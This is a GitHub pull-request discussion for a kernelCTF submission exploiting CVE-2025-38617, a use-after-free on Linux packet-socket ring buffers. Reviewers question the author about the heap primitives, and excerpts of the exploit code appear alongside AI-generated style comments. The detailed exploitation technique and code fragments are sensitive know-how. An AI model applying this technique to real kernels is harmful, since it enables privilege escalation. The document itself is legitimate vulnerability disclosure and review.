Add kernelCTF CVE-2025-38617_mitigation_cos by quanggle97 · Pull Request #339 · google/security-research

quanggle97 · 2026-02-25T23:47:25Z

No description provided.

quanggle97 · 2026-02-26T08:07:11Z

@koczkatamas Pull request is ready for reviewing

koczkatamas

Hey!

Your exploit code and writeup are very long, and although they explain a lot of details, it's very hard to follow them or to get a quick understanding of what exactly is happening.

So I have a few questions:

Q1. Which kernel structures (struct XXX within the kernel source) are freed and then used due to the UAF? Which fields of those objects are used (those which are relevant for the exploitation)?

Q2. What object did you spray in pages_order2_read_primitive to allocate in the space of the UAF'd object from Q1?

Q3. My understanding is that you can overwrite a simple_xattr's structure size field via the original vulnerability in pages_order2_read_primitive.

Let's say simple_xattr looks like this:

struct simple_xattr {
        struct rb_node             rb_node;              /*     0    24 */
        char *                     name;                 /*    24     8 */
        size_t                     size;                 /*    32     8 */
        char                       value[];              /*    40     0 */
};

What is the effect of the vulnerability you are using? Out-of-bounds write of 8 bytes? How / where in the source code exactly do you set the right offset (the offset of the size field)? What cache (in case of SLAB) or order of pages (in case of BUDDY) are you writing from to which cache/pages?

Where do you set the length of the write? (Is it filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);?)

If you'd like to overwrite only 8 bytes, why don't you send an 8-byte packet? To get into the right cache?

Are the other fields (like rb_node, name, or value) overwritten, or does your primitive allow a precise 8-byte overwrite of only the size field?

What other constraints do you have for this primitive? Can you choose any offset and size, or are there any restrictions?

Q4. From which object's which field do you leak leaked_content_simple_xattr_kernel_address?

Do I understand correctly that you reuse the original OOB overwrite primitive to overwrite a pgv[] order-2 page to be able to mmap the address of the leaked_content_simple_xattr and modify its values to get the simple_xattr_read_write primitive?

Which fields do you use for the RW purpose? name or value+size? Where in the source code can I see these fields being set?

Q5. Why do you need the abr_page_read_write_primitive when you could also RW with the simple_xattr_read_write_primitive?

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+	rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+	rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+	rx_ring.tp_sizeof_priv = 16248;


Is this the place where you adjust the offset to be written? How do you calculate this offset exactly? Please use struct sizes and field offsets in the calculation so that it is clear how this works.

Q1: The ring buffer is freed (represented by struct pgv, which is basically an array of kernel pointers).
Q2: Another ring buffer is used for reclamation.
Q3: The vuln allows me to perform an OOB write with a controlled size and a controlled offset. I think I described how the exploit controls the offset in the UAF section. The packet is allocated in packet_sendmsg_spkt(), which has a check inside dev_validate_header() that doesn't allow a packet with an 8-byte length. I specifically chose to overwrite only the size field. I could build a generic page overflow primitive, but I decided to just pick the numbers that fit my strategy.
Q4: Yes
Q5: The simple_xattr_read_write_primitive only allows us to read/write that struct simple_xattr object, not to perform arbitrary read/write. I just want to keep the simple_xattr_read_write_primitive alive. If we free that struct simple_xattr object, what if we fail to reclaim it with something we want?
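
The Q3 answer says the write is limited to the size field. A minimal userspace sketch of what that means for the rb-tree layout quoted in Q3 of the review: an 8-byte copy placed at offsetof(size) changes size and leaves rb_node, name, and value untouched. The mirror structs and the helper overwrite_size_only are illustrative assumptions, not code from the exploit, and the offsets assume a 64-bit (LP64) target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Userspace mirror of the kernel's struct rb_node (three words on LP64). */
struct rb_node_mirror {
	unsigned long parent_color;
	struct rb_node_mirror *right;
	struct rb_node_mirror *left;
};

/* Userspace mirror of the struct simple_xattr layout quoted in Q3. */
struct simple_xattr_mirror {
	struct rb_node_mirror rb_node;	/* offset  0, size 24 */
	char *name;			/* offset 24, size  8 */
	size_t size;			/* offset 32, size  8 */
	char value[];			/* offset 40 */
};

/*
 * Hypothetical helper: model an 8-byte write that lands exactly on the
 * size field. Only bytes [32, 40) of the object are modified.
 */
static void overwrite_size_only(struct simple_xattr_mirror *x, uint64_t new_size)
{
	assert(sizeof(x->size) == sizeof(new_size));
	memcpy((char *)x + offsetof(struct simple_xattr_mirror, size),
	       &new_size, sizeof(new_size));
}
```

A larger size value is what would later let a read of the xattr return bytes beyond value[], which is the role the thread assigns to pages_order2_read_primitive.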

Hey!

A few followup questions / requests:

Q1) Why is packet_reserve = 38 in mitigation and packet_reserve = 30 in the COS version, what's the difference between the two versions (field offsets, source code differences)?

Q2) IIUC first you overwrite simple_xattr.size at offset 32 (in pages_order2_read_primitive_init), and then pgv[0].buffer at offset 0 (in simple_xattr_read_write_primitive_init), but both functions use tp_sizeof_priv = 16248 and packet_reserve = 38 (in mitigation). What am I missing, where is the 32 bytes difference that you overwrite different offsets with the seemingly same parameters?

Q3) So IIUC you can read/write arbitrary address with simple_xattr_read_write_primitive too but simple_xattr requires spraying the object again and this process can fail (unreliable), so you created abr_page_read_write_primitive which is a stable ARB read/write primitive. Is my understanding correct or are there other differences?

Q1: Because the struct simple_xattr layout differs between COS and Mitigation (one uses a linked list and the other uses a red-black tree).
Q2: I overwrite pgv + X, where X is the same offset as the size field's offset in struct simple_xattr. Overwriting pgv[0] is possible too, but since the difference doesn't matter, I decided to keep the offset the same.
Q3: Yes. We need to win the race two times to reach this point, and I don't want to lose that strong primitive, so I tried to design the rest of the exploit flow so that it cannot fail.
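
The Q1 answer ties the packet_reserve difference (38 vs 30) to the simple_xattr layout. A small sketch, assuming an LP64 target and userspace mirrors of the two layouts (a two-pointer list head versus a three-word rb_node), shows that the size field moves by 8 bytes, which matches 38 - 30. Pairing the list-based layout with COS is an inference from the smaller reserve value, not something the thread states; all struct and function names below are illustrative.

```c
#include <assert.h>
#include <stddef.h>

/* Mirrors of the kernel's list_head (2 pointers) and rb_node (3 words). */
struct list_head_mirror {
	struct list_head_mirror *next, *prev;
};

struct rb_node_mirror {
	unsigned long parent_color;
	struct rb_node_mirror *right, *left;
};

/* Assumed list-based layout: size lands at offset 24. */
struct simple_xattr_list {
	struct list_head_mirror list;
	char *name;
	size_t size;
	char value[];
};

/* rb-tree layout as quoted in the review: size lands at offset 32. */
struct simple_xattr_rb {
	struct rb_node_mirror rb_node;
	char *name;
	size_t size;
	char value[];
};

/* packet_reserve values mentioned in the thread. */
enum { RESERVE_MITIGATION = 38, RESERVE_COS = 30 };

/* How far the size field moves between the two layouts. */
static long size_offset_delta(void)
{
	return (long)offsetof(struct simple_xattr_rb, size) -
	       (long)offsetof(struct simple_xattr_list, size);
}

/* Compile-time check that the reserve delta equals the layout delta. */
static_assert(RESERVE_MITIGATION - RESERVE_COS ==
	      (int)(sizeof(struct rb_node_mirror) - sizeof(struct list_head_mirror)),
	      "reserve delta should match the layout delta on LP64");
```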

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+	struct tpacket_req3 tx_ring = {};
+	tx_ring.tp_block_size = PAGES_ORDER1_SIZE;
+	tx_ring.tp_block_nr = 1;
+	tx_ring.tp_frame_size = PAGES_ORDER1_SIZE;
+	tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr;
+
+	struct tpacket_req3 rx_ring = {};
+	rx_ring.tp_block_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+	rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+	rx_ring.tp_sizeof_priv = 16248;
+	rx_ring.tp_retire_blk_tov = USHRT_MAX;
+
+	struct sock_filter filter[MAX_FILTER_LEN] = {};
+	for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
+		filter[i].code = BPF_LD | BPF_IMM;
+		filter[i].k = 0xcafebabe;
+	}
+
+	filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
+	filter[MAX_FILTER_LEN - 1].k = sizeof(void *);
+
+	primitive->victim_packet_socket_config = victim_packet_socket_config_create(
+		(struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo
+		(struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr
+		tx_ring,	// tx_ring
+		rx_ring,	// rx_ring
+		1,		// packet_loss
+		TPACKET_V3,	// packet_version
+		30,		// packet_reserve
+		filter		// filter
+	);


Significant code duplication for setting up packet socket configuration rings and BPF filters.

Recommendation: Extract the common packet socket configuration logic into a dedicated utility function.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

primitive->victim_packet_socket_config = util_create_shared_packet_socket_config();

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

As I commented above, I don't build a generic page overflow primitive. Part of the packet socket configuration is used to build that page overflow primitive. For example, if I want to perform a PAGES_ORDER3_SIZE overflow, I will choose a victim ring buffer with a buffer size of PAGES_ORDER4_SIZE and a reclamation ring buffer with a buffer size of PAGES_ORDER3_SIZE. packet_reserve can be modified to affect the overwrite offset too. I think I described this in the UAF section.
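
The sizing rule in this reply can be written out as arithmetic. A sketch, assuming 4 KiB base pages and that PAGES_ORDERn_SIZE means the page size shifted left by n (the helper names are hypothetical and do not appear in the exploit):

```c
#include <assert.h>

#define EXAMPLE_PAGE_SIZE 4096UL	/* assumption: 4 KiB base pages */

/* Size in bytes of a buddy allocation of the given order. */
static unsigned long pages_order_size(unsigned int order)
{
	return EXAMPLE_PAGE_SIZE << order;
}

/*
 * Bytes by which a block sized for the victim ring exceeds the buffer
 * that actually backs it after reclamation.
 */
static unsigned long overflow_span(unsigned int victim_order,
				   unsigned int reclaim_order)
{
	assert(victim_order >= reclaim_order);
	return pages_order_size(victim_order) - pages_order_size(reclaim_order);
}
```

With a victim order of 4 and a reclamation order of 3, overflow_span(4, 3) equals pages_order_size(3), which is the PAGES_ORDER3_SIZE overflow described in the reply.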

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+
+		alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE);
+		void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0);
+		void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);


Variable name mem1 is too generic and similar to mem.

Recommendation: Use a descriptive name representing the specific mapping, such as fake_xattr_mem.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *fake_xattr_mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

At that point, these addresses are freed, and the expectation is that a struct pgv object is successfully reclaimed at one of them. I kept the names mem and mem1 to reflect that, at this point, the exploit still does not know what is actually at these addresses.

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+
+bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive)
+{
+	void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive);


Too generic variable name 'tmp' used for primitive output.

Recommendation: Rename the variable to reflect its contents, such as leaked_data.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *leaked_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

koczkatamas · 2026-02-27T17:00:51Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c

+	if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) {
+		pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = next;
+		pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
+	} else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) {
+		pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = prev;
+		pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
+	}


Logic to set kernel address variables is duplicated verbatim across if/else blocks.

Recommendation: Refactor the logic to determine the valid address first, then assign the variables in a single shared block.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

u64 valid_addr = ((next & (PAGES_ORDER2_SIZE - 1)) == 0) ? next : prev;
pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = valid_addr;
pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = valid_addr + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
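
Note that the suggested ternary assigns prev even when neither pointer is aligned, whereas the original if/else-if leaves both fields untouched in that case. A behavior-preserving sketch follows; struct leak_state and record_leak are hypothetical stand-ins for the exploit's real types, and PAGES_ORDER2_SIZE is assumed to be 16 KiB.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define PAGES_ORDER2_SIZE (4096UL << 2)	/* assumption: 4 KiB pages, order 2 */

/* Hypothetical stand-in for the two fields assigned in the diff. */
struct leak_state {
	uint64_t overflowed_simple_xattr_kernel_address;
	uint64_t leaked_content_simple_xattr_kernel_address;
};

static bool is_order2_aligned(uint64_t addr)
{
	return (addr & (PAGES_ORDER2_SIZE - 1)) == 0;
}

/*
 * Pick the aligned pointer first (next takes priority, as in the diff),
 * then assign both fields once. Returns false and leaves the state
 * untouched when neither pointer is order-2 aligned.
 */
static bool record_leak(struct leak_state *s, uint64_t next, uint64_t prev,
			size_t leaked_simple_xattrs_idx)
{
	uint64_t base;

	if (is_order2_aligned(next))
		base = next;
	else if (is_order2_aligned(prev))
		base = prev;
	else
		return false;

	s->overflowed_simple_xattr_kernel_address = base;
	s->leaked_content_simple_xattr_kernel_address =
		base + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
	return true;
}
```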

koczkatamas · 2026-02-27T17:00:52Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c

+	rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
+	rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
+	rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
+	rx_ring.tp_sizeof_priv = 16248;


Usage of an unexplained magic number.

Recommendation: Replace the magic number with a descriptive macro or add an explanatory comment.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

rx_ring.tp_sizeof_priv = TPACKET_SIZEOF_PRIV_VALUE; /* 16248 */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Again, I don't build a generic page overflow function. If I had to use a descriptive macro, it would look like TPACKET_SIZEOF_PRIV_VALUE_TO_KEEP_THE_UNCONTROLLED_WRITE_DATA_NEAR_THE_END_OF_RECLAMATION_BUFFER_FROM_RING_BUFFER ...

koczkatamas · 2026-02-27T17:00:52Z

pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c

+	struct sock_filter filter[MAX_FILTER_LEN] = {};
+	for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
+		filter[i].code = BPF_LD | BPF_IMM;
+		filter[i].k = 0xcafebabe;


Unexplained magic number used in BPF filter.

Recommendation: Define the magic number as a macro or document its irrelevance.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

filter[i].k = BPF_PLACEHOLDER_VALUE; /* 0xcafebabe */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
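
One way to address this comment while keeping the filter's shape is to name both constants. The sketch below assumes the immediate loaded by the padding instructions is irrelevant to the exploit (the review comment hints at this, the thread does not confirm it). EXAMPLE_FILTER_LEN, BPF_PADDING_IMM, ACCEPTED_BYTES, and build_truncating_filter are hypothetical names. In classic BPF, the value returned by a BPF_RET | BPF_K instruction is the number of packet bytes the socket filter accepts.

```c
#include <linux/filter.h>
#include <stddef.h>

#define EXAMPLE_FILTER_LEN 8		/* hypothetical; the exploit uses MAX_FILTER_LEN */
#define BPF_PADDING_IMM 0xcafebabe	/* arbitrary value, assumed to be irrelevant */
#define ACCEPTED_BYTES sizeof(void *)	/* bytes of each packet the filter keeps */

/*
 * Fill all but the last slot with "load immediate" padding, then end
 * with a return that accepts only the first ACCEPTED_BYTES bytes.
 */
static void build_truncating_filter(struct sock_filter *filter, size_t len)
{
	if (len == 0)
		return;

	for (size_t i = 0; i + 1 < len; i++) {
		filter[i] = (struct sock_filter){
			.code = BPF_LD | BPF_IMM,
			.k = BPF_PADDING_IMM,
		};
	}

	filter[len - 1] = (struct sock_filter){
		.code = BPF_RET | BPF_K,
		.k = ACCEPTED_BYTES,
	};
}
```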

wizkernel · 2026-03-09T14:05:24Z

I tried to execute it locally on both mitigation-v4-6.6 and cos-109-17800.519.4, and it gets stuck in pages_order2_read_primitive_build. Any idea why? Is the race failing?

Is it related to this? I saw you modified it:
struct timespec pages_order2_read_primitive_timer_interrupt_amplitude = { .tv_nsec = 155000 };

wizkernel · 2026-03-09T20:41:19Z

It also seems that the exploit does not have a 100% success rate as stated in the "stability_notes". Most of the time it causes a kernel NULL pointer dereference bug, which contradicts what you said in your blog - that it can be deterministic.

quanggle97 · 2026-03-10T08:52:09Z

@wizkernel: Because the pull request check script automatically kills the run if no flag is output within 60 seconds, I had to tune the interrupt amplitude so that the race is won within 60 seconds. There is a way to detect whether tpacket_rcv() was hit and whether the interrupt hit, but doing so prevents the exploit from finishing in time. The NULL pointer dereference usually happens on the non-mitigation instance, because I developed the exploit for the mitigation instance first and ported it to the other instance later. The stability_notes value is just for reference; I usually copy it from an old file and modify the necessary fields. But I'm pretty sure that if you use the correct interrupt amplitude for your local machine, or modify the code locally to loop over a range of interrupt amplitudes, the success rate of the mitigation exploit is around 90% to 100% (again, this usually takes more than 60 seconds).
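
The "interrupt amplitude range loop" mentioned here could look roughly like the following. This is a sketch only: sweep_amplitude, try_race_fn, and example_try_race are hypothetical, the callback stands in for one full race attempt, and the stub simply "wins" at a preset value so the loop can be exercised without a kernel target.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <time.h>

/* One race attempt with the given timer amplitude; true means the race was won. */
typedef bool (*try_race_fn)(struct timespec amplitude, void *ctx);

/*
 * Try each amplitude in [start_nsec, end_nsec] once, stopping when an
 * attempt succeeds or the time budget is used up. Returns the winning
 * tv_nsec value, or -1 if no attempt succeeded.
 */
static long sweep_amplitude(long start_nsec, long end_nsec, long step_nsec,
			    double budget_sec, try_race_fn try_race, void *ctx)
{
	struct timespec begin, now;

	if (step_nsec <= 0 || start_nsec > end_nsec)
		return -1;

	clock_gettime(CLOCK_MONOTONIC, &begin);
	for (long nsec = start_nsec; nsec <= end_nsec; nsec += step_nsec) {
		clock_gettime(CLOCK_MONOTONIC, &now);
		double elapsed = (double)(now.tv_sec - begin.tv_sec) +
				 (double)(now.tv_nsec - begin.tv_nsec) / 1e9;
		if (elapsed >= budget_sec)
			return -1;

		struct timespec amplitude = { .tv_sec = 0, .tv_nsec = nsec };
		if (try_race(amplitude, ctx))
			return nsec;
	}
	return -1;
}

/* Stub attempt for illustration: succeeds only at the amplitude stored in ctx. */
static bool example_try_race(struct timespec amplitude, void *ctx)
{
	return amplitude.tv_nsec == *(const long *)ctx;
}
```

A local run without the 60-second limit could pass a larger budget_sec and a range around the 155000 ns value quoted earlier in the thread.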

quanggle97 · 2026-03-10T09:49:16Z

@wizkernel The blog post describes the exploit flow optimized for the mitigation instance. For the non-mitigation instance, there should be other choices for reclaiming the UAF object, because there is no heap hardening. Back then, I submitted the flag for the LTS instance too but could not win the slot (the last slot before userns was disabled). Therefore, I didn't try to write another version optimized for the non-mitigation instance (COS only needs 10% stability).

quanggle97 added 4 commits February 26, 2026 06:47

Add kernelCTF CVE-2025-38617_mitigation_cos

be0ecfa

Update exploit.c

2ca48fb

Update exploit.c

39a2c06

Update exploit.md

a1e716d

koczkatamas reviewed Feb 27, 2026

View reviewed changes

quanggle97 added 24 commits February 28, 2026 15:40

Update exploit.c

fb86478

Update exploit.c

2b06b5a

Update exploit.md

c9da30d

Update exploit.c

95ed168

Update exploit.c

6d34363

Update exploit.c

5c47321

Update exploit.c

3772ee5

Update exploit.c

3521137

Update exploit.c

c7b43ce

Update exploit.c

1677f9f

Update exploit.c

b63016d

Update exploit.c

60da077

Update exploit.c

7c988b3

Update exploit.h

f8ffedc

Update exploit.c

152dd3f

Update exploit.c

4444b69

Update exploit.c

aaa58a1

Update exploit.md

7d80c19

Update exploit.c

8f37de8

Update exploit.c

f39792b

Update exploit.c

1d44cba

Update exploit.c

6be41d3

Update exploit.c

cb34bd7

Update exploit.c

18326ee

quanggle97 added 6 commits March 1, 2026 18:11

Update exploit.c

e891259

Update exploit.c

d025b8a

Update exploit.c

9d593f5

Update exploit.c

2cde2f7

Update exploit.c

a58b2a5

Update exploit.c

b5696f2

artmetla added the label "kCTF: vuln OK" (The submission exploits the claims vulnerability (passed manual verification)) on Mar 2, 2026

quanggle97 added 2 commits March 10, 2026 16:04

Update metadata.json

2766b62

Update metadata.json

0d2abc6
